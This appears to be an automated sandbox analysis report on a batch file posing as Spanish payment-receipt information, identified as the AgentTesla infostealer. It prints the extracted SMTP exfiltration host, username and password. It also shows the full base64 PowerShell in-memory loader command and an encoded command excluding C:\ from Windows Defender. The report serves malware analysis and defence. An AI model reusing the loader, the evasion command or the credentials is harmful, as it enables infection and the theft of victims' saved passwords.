Analysis
-
max time kernel
102s -
max time network
104s -
platform
windows10-1703_x64 -
resource
win10-20231129-es -
resource tags
arch:x64arch:x86image:win10-20231129-eslocale:es-esos:windows10-1703-x64systemwindows -
submitted
06-12-2023 11:38
Static task
static1
Behavioral task
behavioral1
Sample
informaci�n del recibo de pago.bat
Resource
win10-20231129-es
General
-
Target
informaci�n del recibo de pago.bat
-
Size
952KB
-
MD5
504fba0abe6add67db0789d3d633d023
-
SHA1
9d378def271f305b024bd1894516dc8cee68639c
-
SHA256
532c430557d989ef518fa43b5757d39785050a64945c8c95e2f739f88d76ea66
-
SHA512
01156ed686083a1b163661e3536fa438c38378687abc682597c1ffaf9872d1ae5004354992a907e3c3be1b9f805676e1dc3a3c07f6e06a1aff7448602a65127f
-
SSDEEP
24576:ZjAnOhGCf0fFcQv+VJMUUwlEeGoP7lWVy6x/GF:siYGIUUALWVFsF
Malware Config
Extracted
Protocol: smtp- Host:
mail.tecnosilos.com.py - Port:
587 - Username:
[email protected] - Password:
u(B[W[~XtT8,
Extracted
agenttesla
Protocol: smtp- Host:
mail.tecnosilos.com.py - Port:
587 - Username:
[email protected] - Password:
u(B[W[~XtT8, - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Executes dropped EXE 1 IoCs
Processes:
Blpgid.pngpid process 1840 Blpgid.png -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Blpgid.pngdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Blpgid.png Key opened \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Blpgid.png Key opened \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Blpgid.png -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 api.ipify.org 2 api.ipify.org -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
Blpgid.pngpowershell.exepid process 1840 Blpgid.png 1840 Blpgid.png 1840 Blpgid.png 1840 Blpgid.png 1840 Blpgid.png 2092 powershell.exe 2092 powershell.exe 2092 powershell.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
Blpgid.pngpowershell.exedescription pid process Token: SeDebugPrivilege 1840 Blpgid.png Token: SeDebugPrivilege 1840 Blpgid.png Token: SeDebugPrivilege 2092 powershell.exe Token: SeIncreaseQuotaPrivilege 2092 powershell.exe Token: SeSecurityPrivilege 2092 powershell.exe Token: SeTakeOwnershipPrivilege 2092 powershell.exe Token: SeLoadDriverPrivilege 2092 powershell.exe Token: SeSystemProfilePrivilege 2092 powershell.exe Token: SeSystemtimePrivilege 2092 powershell.exe Token: SeProfSingleProcessPrivilege 2092 powershell.exe Token: SeIncBasePriorityPrivilege 2092 powershell.exe Token: SeCreatePagefilePrivilege 2092 powershell.exe Token: SeBackupPrivilege 2092 powershell.exe Token: SeRestorePrivilege 2092 powershell.exe Token: SeShutdownPrivilege 2092 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeSystemEnvironmentPrivilege 2092 powershell.exe Token: SeRemoteShutdownPrivilege 2092 powershell.exe Token: SeUndockPrivilege 2092 powershell.exe Token: SeManageVolumePrivilege 2092 powershell.exe Token: 33 2092 powershell.exe Token: 34 2092 powershell.exe Token: 35 2092 powershell.exe Token: 36 2092 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 5040 wrote to memory of 4908 5040 cmd.exe cmd.exe PID 5040 wrote to memory of 4908 5040 cmd.exe cmd.exe PID 4908 wrote to memory of 1996 4908 cmd.exe cmd.exe PID 4908 wrote to memory of 1996 4908 cmd.exe cmd.exe PID 4908 wrote to memory of 508 4908 cmd.exe xcopy.exe PID 4908 wrote to memory of 508 4908 cmd.exe xcopy.exe PID 4908 wrote to memory of 2780 4908 cmd.exe cmd.exe PID 4908 wrote to memory of 2780 4908 cmd.exe cmd.exe PID 4908 wrote to memory of 4564 4908 cmd.exe xcopy.exe PID 4908 wrote to memory of 4564 4908 cmd.exe xcopy.exe PID 4908 wrote to memory of 1840 4908 cmd.exe Blpgid.png PID 4908 wrote to memory of 1840 4908 cmd.exe Blpgid.png -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
Blpgid.pngdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Blpgid.png -
outlook_win_path 1 IoCs
Processes:
Blpgid.pngdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Blpgid.png
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\informaci�n del recibo de pago.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\informaci�n del recibo de pago.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Blpgid.png3⤵PID:508
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1996
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2780
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\informaci�n del recibo de pago.bat" C:\Users\Admin\AppData\Local\Temp\Blpgid.png.bat3⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\Blpgid.pngC:\Users\Admin\AppData\Local\Temp\Blpgid.png -win 1 -enc JABUAHYAZgBsAHIAcQBtAG8AIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHYAZgBsAHIAcQBtAG8AKQA7ACQASABjAHoAZgBiAGsAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABQAGkAaABkAGQAYgBtAHcAcwBxACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEgAYwB6AGYAYgBrAGgALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFAAaQBoAGQAZABiAG0AdwBzAHEALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFAAaQBoAGQAZABiAG0AdwBzAHEALgBDAGwAbwBzAGUAKAApADsAJABIAGMAegBmAGIAawBoAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGQAcQBwAHQAYQBuAHYAYwBpACkAOwAgACQAVABnAHEAcwB4AHMAdQByAHEAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABLAGQAcQBwAHQAYQBuAHYAYwBpACkAOwAgACQAUgBsAGwAaABhACAAPQAgACQAVABnAHEAcwB4AHMAdQByAHEAdgAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEUAcQBxAGEAYQBwAGYAcAByAHEAIAA9ACAAJABSAGwAbABoAGEALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
Filesize
952KB
MD5504fba0abe6add67db0789d3d633d023
SHA19d378def271f305b024bd1894516dc8cee68639c
SHA256532c430557d989ef518fa43b5757d39785050a64945c8c95e2f739f88d76ea66
SHA51201156ed686083a1b163661e3536fa438c38378687abc682597c1ffaf9872d1ae5004354992a907e3c3be1b9f805676e1dc3a3c07f6e06a1aff7448602a65127f
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a